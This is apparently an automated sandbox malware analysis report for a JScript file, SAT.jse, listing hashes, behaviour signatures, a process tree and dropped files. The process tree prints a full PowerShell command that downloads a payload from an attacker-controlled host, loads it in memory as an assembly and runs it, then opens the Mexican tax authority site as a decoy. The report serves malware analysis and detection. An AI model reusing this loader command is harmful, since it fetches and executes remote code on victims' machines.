Overview

overview

8

Static

static

1

SAT.jse

windows7-x64

8

SAT.jse

windows10-2004-x64

8

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/04/2024, 22:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SAT.jse

  • Size

    103KB

  • MD5

    d09120d3a8af26122f2c9d9f3afc21ff

  • SHA1

    48663c9cfeb03032d21c0dde3aac983880755d90

  • SHA256

    d02ca5e0c34d4f193a0f0e8b9c0b0d672c88df2b746faccab1da263ac012fee8

  • SHA512

    44a9561a67821d04eee5afcd15753933fba953c4390da0617c8d96d51840265c8381d51ec831d1a9f620915cd80859e8e95217a559fd77e192cbb471c569080a

  • SSDEEP

    3072:wKq7TBtTGnqC1MyRMlk5CPM6STceFImdWIH2Es6Tp6nTI/NJ/xMFjToNtmL8+a5V:wKqTBRGnqC6yRMlk5CPM6STc4ImdWIHh

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\SAT.jse"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2556
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c $bytes = (Invoke-WebRequest """https://j7sqphrtxb.d3vils.xyz/uKDrwMfZTd/xls.php""" -UseBasicParsing).Content; $assembly = [System.Reflection.Assembly]::Load($bytes); $entryPointMethod = $assembly.GetTypes().Where({ $_.Name -eq """Program""" }, """First""").GetMethod("""Main""", [Reflection.BindingFlags] """Static, Public, NonPublic"""); $entryPointMethod.Invoke($null, $null); $url = """https://www.sat.gob.mx/home""";"" Start-Process $url;
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Windows\System32\AuthHost.exe
        "C:\Windows\System32\AuthHost.exe"
        3⤵
          PID:4288
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.sat.gob.mx/home
          3⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:4448
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d74546f8,0x7ff9d7454708,0x7ff9d7454718
            4⤵
              PID:1820
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,116797359924836806,15835103674034485932,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
              4⤵
                PID:3388
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,116797359924836806,15835103674034485932,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1396
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,116797359924836806,15835103674034485932,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
                4⤵
                  PID:2468
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,116797359924836806,15835103674034485932,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
                  4⤵
                    PID:1924
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,116797359924836806,15835103674034485932,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                    4⤵
                      PID:60
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,116797359924836806,15835103674034485932,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:8
                      4⤵
                        PID:1800
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,116797359924836806,15835103674034485932,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:8
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3692
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,116797359924836806,15835103674034485932,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
                        4⤵
                          PID:3860
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,116797359924836806,15835103674034485932,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3928 /prefetch:1
                          4⤵
                            PID:556
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,116797359924836806,15835103674034485932,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
                            4⤵
                              PID:3796
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,116797359924836806,15835103674034485932,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
                              4⤵
                                PID:3624
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,116797359924836806,15835103674034485932,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 /prefetch:2
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4568
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:3044
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:3224

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                              Filesize

                              152B

                              MD5

                              e1b45169ebca0dceadb0f45697799d62

                              SHA1

                              803604277318898e6f5c6fb92270ca83b5609cd5

                              SHA256

                              4c0224fb7cc26ccf74f5be586f18401db57cce935c767a446659b828a7b5ee60

                              SHA512

                              357965b8d5cfaf773dbd9b371d7e308d1c86a6c428e542adbfe6bac34a7d2061d0a2f59e84e5b42768930e9b109e9e9f2a87e95cf26b3a69cbff05654ee42b4e

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                              Filesize

                              152B

                              MD5

                              9ffb5f81e8eccd0963c46cbfea1abc20

                              SHA1

                              a02a610afd3543de215565bc488a4343bb5c1a59

                              SHA256

                              3a654b499247e59e34040f3b192a0069e8f3904e2398cbed90e86d981378e8bc

                              SHA512

                              2d21e18ef3f800e6e43b8cf03639d04510433c04215923f5a96432a8aa361fdda282cd444210150d9dbf8f028825d5bc8a451fd53bd3e0c9528eeb80d6e86597

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\42f8f040-7b03-44f4-aa5d-c0e2156b07a1.tmp
                              Filesize

                              6KB

                              MD5

                              7f17096191974c6b08130acf5ac771ff

                              SHA1

                              0b58e4a8540a79decf1d9714c90e6cffec0ce643

                              SHA256

                              1ef83119b96a3e136eb331596da6113e3e09f1bd08faeb62e4e15eda091d5e9c

                              SHA512

                              5189b98897bbabdf18edefb7908ab463255ee0a17d1c1041ab3a65e3df77c2059ed047deec1731ddd2ee22900780e87c02537edfd7dee84221edc37dcd4ba093

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                              Filesize

                              182B

                              MD5

                              5e4ebcacacdd75750f08ce243ebcfcff

                              SHA1

                              712696133ee233677843d0cb967a2fc434fecb4a

                              SHA256

                              26cddb5a7c2ad9306b3c45fafa365124adae52936b75ea60b9cfdfbf2052c3f5

                              SHA512

                              8b1a9c88ab3ac75e8ac8ff62452a42e0dc1a903d05b982867d9995929f2c305b824126bee7cc9a36104b4f2ebf7671e4fcfe59151bb35c9072b9936a8bdb4756

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                              Filesize

                              6KB

                              MD5

                              31ffd1729619a05028b2ac60b064bc40

                              SHA1

                              421155681767d5bfe9838fbb7d5452aac0cc7aab

                              SHA256

                              bb1f692ff47035083344a519bc2fff55cf3190c2c640f8601ac8b2885cd81d22

                              SHA512

                              25e7d2d96f54eeedc51ba8489e9e1101e23179a3f427d06773f9c7253a87004970e870adff16e7b420e064b279bbefb2f58192f4f52999f08d25a494e83b5055

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                              Filesize

                              6KB

                              MD5

                              9b9cad78afca5cfebc10a25046171b94

                              SHA1

                              a769aeccbbf737abad81b8e1b59d7a9b60b85f62

                              SHA256

                              f52180a98987f7b425dc881d3fa704f1409217b24258a4b012269878a0d9aa87

                              SHA512

                              8d96e8a8867e7290fc6a3fdc074d71f292e981a8a82137f58384c0dd5fe39a4fda71da7bb6a6903f66aaf264e8c7926da8c62ecb873ad05bcc4be1bdfd1741e0

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                              Filesize

                              6KB

                              MD5

                              798f5e2a6bedc84be364bbec57fddf40

                              SHA1

                              397df7f046eabf796742761f012c186c7f5b144f

                              SHA256

                              9b693a4cdbbd71045671a5e8894bf550c6c97303866d4d61b17f03fa6b56109c

                              SHA512

                              ab939671fae17631eed8b944c4ce3783fc34b5bb184f51a473a30f4a10c5a74acb07a0137120a7c5a1e5a01d449bc9ab63c34034f23bb95e4f3c9455c2c86825

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                              Filesize

                              16B

                              MD5

                              6752a1d65b201c13b62ea44016eb221f

                              SHA1

                              58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                              SHA256

                              0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                              SHA512

                              9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                              Filesize

                              11KB

                              MD5

                              53351f4daa33880c31f08eff237b55c0

                              SHA1

                              32ea14d4cc311acc61ecf685268cd1e931803485

                              SHA256

                              8c8112b43c9b76e268f784616463ea6b0a37fbb1a186ab63cc6efed60659a21d

                              SHA512

                              bb7766150a95bc001a5e763e77ea76f32b0fc05002c3ff15df94487cdad5c4b6a70ca998c6cb17f91d6cb8364db0a76e43707bbb0daca3d1d8a6e38b5392ad85

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_txuzczk2.p24.ps1
                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              Download Submit

                            • memory/2736-21-0x00007FF9C7160000-0x00007FF9C7C21000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/2736-0-0x00007FF9C7160000-0x00007FF9C7C21000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/2736-16-0x0000022361040000-0x000002236105E000-memory.dmp

                              Filesize

                              120KB

                              Download

                            • memory/2736-15-0x0000022361200000-0x0000022361276000-memory.dmp

                              Filesize

                              472KB

                              Download

                            • memory/2736-14-0x000002235EC60000-0x000002235EC70000-memory.dmp

                              Filesize

                              64KB

                              Download

                            • memory/2736-13-0x000002235EC30000-0x000002235EC46000-memory.dmp

                              Filesize

                              88KB

                              Download

                            • memory/2736-1-0x000002235EC60000-0x000002235EC70000-memory.dmp

                              Filesize

                              64KB

                              Download

                            • memory/2736-12-0x0000022346A80000-0x0000022346AA2000-memory.dmp

                              Filesize

                              136KB

                              Download

                            • memory/2736-2-0x000002235EC60000-0x000002235EC70000-memory.dmp

                              Filesize

                              64KB

                              Download

                            • memory/4288-17-0x0000021A5CD90000-0x0000021A5CD91000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/4288-55-0x0000000180000000-0x0000000180071000-memory.dmp

                              Filesize

                              452KB

                              Download